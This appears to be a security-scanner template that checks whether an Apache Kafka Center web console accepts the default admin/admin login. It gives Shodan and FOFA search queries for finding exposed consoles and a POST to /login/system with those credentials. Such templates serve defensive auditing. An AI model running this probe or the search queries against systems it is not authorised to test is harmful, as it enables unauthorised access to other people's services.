漏洞描述
shodan: http.title:"Kafka Center"
fofa: title="Kafka Center"
id: kafka-center-default-password
info:
name: Apache Kafka Center Default Password
author: dhiyaneshDK
severity: high
verified: true
description: |
shodan: http.title:"Kafka Center"
fofa: title="Kafka Center"
tags: kafka,default-login
created: 2023/06/24
rules:
r0:
request:
method: POST
path: /login/system
headers:
Content-Type: application/json
body: |
{"name":"admin","password":"admin","checkbox":false}
expression: response.status == 200 && response.content_type.contains('application/json') && response.body.bcontains(b'"code":200') && response.body.bcontains(b'"name":"admin"') && response.body.bcontains(b'"realName":null') && response.body.bcontains(b'"teamIDs":null')
expression: r0()